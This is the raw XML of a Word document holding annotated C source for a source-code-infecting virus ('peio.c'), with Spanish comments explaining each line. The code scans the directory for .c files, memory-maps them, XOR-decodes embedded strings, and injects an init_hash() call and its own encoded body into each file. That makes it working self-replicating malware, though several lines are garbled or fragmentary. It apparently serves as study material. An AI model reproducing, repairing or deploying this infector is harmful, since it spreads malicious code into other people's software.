    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>//de tipo char</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>char *buf;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C"/>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>//almacenamos en la variable d de tipo DIR el fichero que queremos abrir y el puntero se posicionara en la primera entrada al directorio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>d = opendir(".");</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//si es mayor a 0 es que se encuentra un archivo ya que si no daria un numero negativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>while dd &gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//evaluamos con un if si la funcion strmcp retorna un numero entero mayor menor o igual que cero  es decir compara cadena de caracteres hasta llegar al caracter situado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve">        //en la ultima posicion si las cadenas son iguales devuelve 0 si es mayor un numero positivo, menor numero negativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve">        //la funcion  strlen calcula el numero de caracteres de la cadena apuntada y comprobamos que sea un fichero .c  o  .C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if(!(strcmp(dir-&gt;d_name+strlen(dir-&gt;d_name)-2,".c"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   !(strcmp(dir-&gt;d_name+strlen(dir-&gt;d_name)-2,".C")))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if&gt;=0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//proceso de infeccion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//almacenamos en la variable size de tipo entero la posicion donde queremos posicionarnos en el fichero con la constante SEEK_END se refiere a posicionar </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//el puntero al final del fichero </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>size = lseek(fd, 0, SEEK_END);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//almacenamos en la variable ptr de tipo void(no devuelve nada) lo que devuelve la funcion mmap que es ubicar la longitud de bytes comnezando donde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//queremos posicionarnos desde el fichero el primer parametro es nulo la variable size es la posicion donde queremos ubicarnos en el fichero, PROT_READ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//es la constante que indica que las paginas deben ser leidas , la otra constantes MAP_PRIVATE Crear un área privada copy-on-write(copiar o escribir).  Almacenar en la  región  no  afecta  al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve">                // fichero original.Es indefinido si los cambios hechos al fichero despues de la llamada a mmap son visibles en la region mapeada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if( (!strstr(ptr,"init_hash")) &amp;&amp;( &gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ) )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D969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//se almacena en la variable mpos de tipo entero  haceindo un casting pasandolo a entero, lo que devulve la funcion strstr que busca en la cadena mpos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//que se pasa a void y si dentro de esata se encuntra la cadena representada en comillas que es ";\n"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//la funcion mmap que devuelve un puntero al area reservada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mpos = (int)strstr((void *)mpos, ";\n");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mpos -= (int)--ptr;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 xml:space="preserve">//si se cumple la condicion entrara en el condicional si en ptr se encuntra la biblioteca include y el signo invierte se refiere a que si es distinto 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if( !(ipos = (int)strstr(++ptr, "#include &lt;")) )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{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</w:r>
      <w:r>
        <w:tab/>
        <w:t>//borra las ubicaciones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</w:r>
      <w:r>
        <w:tab/>
        <w:t>munmap(ptr, size);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</w:r>
      <w:r>
        <w:tab/>
        <w:t>//pausa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}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//borra las ubicaciones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munmap(ptr, size);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//sysconf()  proporciona  una  forma  de  que  la  aplicacion determine ciertos valores para limites del sistema u opciones, en tiempo de ejecucion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//lo que recibe por parametro una constante que signfica el tamaño de la pagina en bytes y se multiplica por tres y se almacena en la variable page de tipo int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page = 3 * (int)sysconf(_SC_PAGESIZE);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</w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//La función ftruncate () hace que el archivo normal al que hacen referencia  tenga un tamaño de bytes de longitud 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//por parametro recibe el archibo que teneos abierto mas la suma de size que es la posicion del puntero en el archivo y page que es el tamaño de la pagina en bytes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ftruncate(fd, size+page);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//se almacena en ptr lo que devulve la funcion mmap que es un puntero al area reservada que especificamos con los parametros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ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);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//se almacena si se encuentra con la funcion strstr la cadena include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ipos = (int)strstr(ptr, "#include &lt;");</w:t>
      </w:r>
      <w:r>
        <w:tab/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</w:r>
      <w:r>
        <w:tab/>
        <w:t>//si se encuentra \n\n se almacenara en ipos en caso contrario devolvera null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ipos = (int)strstr((void *)ipos, "\n\n");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ipos -= (int)ptr;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//cilco for que va de 0 a la cantidad de numeros de caracteres que tenga la cadena que se apunta por parametros (esta cifrado en XOR)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for(i=0;i&lt;strlen(hashinc);i++)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 xml:space="preserve">//a cada vuelta de bucle se almacenara el valor que tenga el array mas la exponenciacion de 0x80(XOR) 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</w:r>
      <w:r>
        <w:tab/>
        <w:t>hashinc[i] ^= 0x80;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for(i=0;i&lt;strlen(hashbeg);i++)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</w:r>
      <w:r>
        <w:tab/>
        <w:t>hashbeg[i] ^= 0x80;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ihole = strlen(hashinc);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 xml:space="preserve">//el ciclo for ira decrementando de el resultado de la resta de size y ipos dividido por ihole hasta meyor o igual a 0 (cantidad de bytes) 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for(i=(size-ipos)/ihole;i&gt;=0;i--)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</w:r>
      <w:r>
        <w:tab/>
        <w:t>//la funcion memcpy copia la cantidad de bytes origen a destino el origen es el primer parametro el segundo separado por una coma es el destino y el tercero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</w:r>
      <w:r>
        <w:tab/>
        <w:t>//el tamaño (cantidad de caracteres almacenado del array hashinc)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</w:r>
      <w:r>
        <w:tab/>
        <w:t>memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole);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memcpy(ptr+ipos, hashinc, ihole);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 xml:space="preserve">//cilco for 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for(i=0;i&lt;strlen(hashinc);i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//se almacena en el array la exponenciacion de la exprecion en XOR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</w:r>
      <w:r>
        <w:tab/>
        <w:t>hashinc[i] ^= 0x80;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</w:r>
      <w:r>
        <w:tab/>
        <w:t>//acumulador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mpos += ihole;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//se almacena despues de hacer el casting la cantidad de memoria a asignar a bytes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buf = (char *)malloc(20*sizeof(char));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//copia la variable de destino bbuff la cadena de string especificado por segundo parametro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strcpy(buf,"\n\tinit_hash();");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en la variable thole se almacena la cantidad de numeros de caracteres de buf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thole = strlen(buf);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//ciclo for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for(i=(size+ihole-mpos)/thole;i&gt;=0;i--)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//copia de bytes origen a destino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</w:r>
      <w:r>
        <w:tab/>
        <w:t>memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);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memcpy(ptr+mpos, buf, thole);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//se almacena la cantidad de caracteres de lo que devuelve la funcion strleng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bhole = strlen(hashbeg);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//copia bytes de origen a destino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memcpy(ptr+size+ihole+thole, hashbeg, bhole);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memcpy(ptr+size+ihole+thole+bhole, hashinc, ihole);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bhole += ihole;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 xml:space="preserve">//retorna la cantidad de caracteres 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//crea cadena de texto primer parametro cadena de destino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sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashbeg[] = \"");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//lo que se encuntra en la variable y le sumamos 22 bytes mas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bhole += 22;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//cilco for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for(i=0;i&lt;strlen(hashbeg);i++)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</w:r>
      <w:r>
        <w:tab/>
        <w:t>hashbeg[i] ^= 0x80;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memcpy(ptr+size+ihole+thole+bhole, hashbeg, strlen(hashbeg));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bhole += strlen(hashbeg);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sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashend[] = \"");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bhole += 22;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memcpy(ptr+size+ihole+thole+bhole, hashend, strlen(hashend));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bhole += strlen(hashend);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sprintf(ptr+size+ihole+thole+bhole, "\";\n");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bhole += 3;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for(i=0;i&lt;strlen(hashend);i++)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</w:r>
      <w:r>
        <w:tab/>
        <w:t>hashend[i] ^= 0x80;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ehole = strlen(hashend);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//infectamos igual que las otras mismas funciones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memcpy(ptr+size+ihole+thole+bhole, hashend, ehole);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msync(ptr, size+page, MS_SYNC);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//borramos ubicacion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munmap(ptr, size+page);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</w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//hacen que el archivo normal denominado por ruta o referenciado por fd se trunque  a un tamaño de bytes de longitud precisa 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 xml:space="preserve">//Si el archivo anterior era más grande que este tamaño, los datos adicionales se pierden. Si el archivo anteriormente era más corto, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//se extiende y la parte extendida se lee como bytes nulos ('\ 0')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ftruncate(fd, size+ihole+thole+bhole+ehole);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>} else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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 xml:space="preserve">//borra las ubicaciones </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>munmap(ptr, size);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>&lt;-----------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>&lt;--end of-peio.c--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00467A97" w:rsidRPr="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>&lt;-----------------&gt;</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00467A97" w:rsidRPr="00D969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BE4"/>
    <w:rsid w:val="00046366"/>
    <w:rsid w:val="00086C13"/>
    <w:rsid w:val="00120657"/>
    <w:rsid w:val="00251BA4"/>
    <w:rsid w:val="00271CDB"/>
    <w:rsid w:val="00467A97"/>
    <w:rsid w:val="0055374A"/>
    <w:rsid w:val="00567BE4"/>
    <w:rsid w:val="00605C18"/>
    <w:rsid w:val="006D1944"/>
    <w:rsid w:val="00A2616A"/>
    <w:rsid w:val="00D9696C"/>
    <w:rsid w:val="00FF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78D9F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4A39674F-BDBD-419F-BC2C-28F33322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32</Pages>
  <Words>7109</Words>
  <Characters>39100</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>325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46117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garrett</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>maximiliano garrett</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-05T22:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-05T23:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>